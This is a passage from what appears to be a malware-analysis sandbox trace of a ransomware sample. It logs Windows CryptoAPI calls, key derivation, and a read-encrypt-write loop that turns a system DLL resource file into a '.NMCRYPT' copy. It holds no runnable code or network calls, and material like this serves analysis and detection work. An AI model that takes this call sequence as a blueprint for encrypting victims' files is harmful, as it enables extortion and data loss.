hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.675] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.675] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.676] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0151.676] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.676] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad278) returned 1 [0151.676] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0151.676] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0151.676] wcslen (_String="\\\\?\\") returned 0x4 [0151.676] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0151.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0151.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0151.676] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=3584) returned 1 [0151.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0151.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.678] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.678] GetLastError () returned 0x0 [0151.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.680] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.680] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.680] GetLastError () returned 0x0 [0151.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.680] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.680] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.680] GetLastError () returned 0x0 [0151.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.680] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.680] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.680] GetLastError () returned 0x0 [0151.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.680] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.681] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.681] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.681] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.681] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.681] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.681] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, 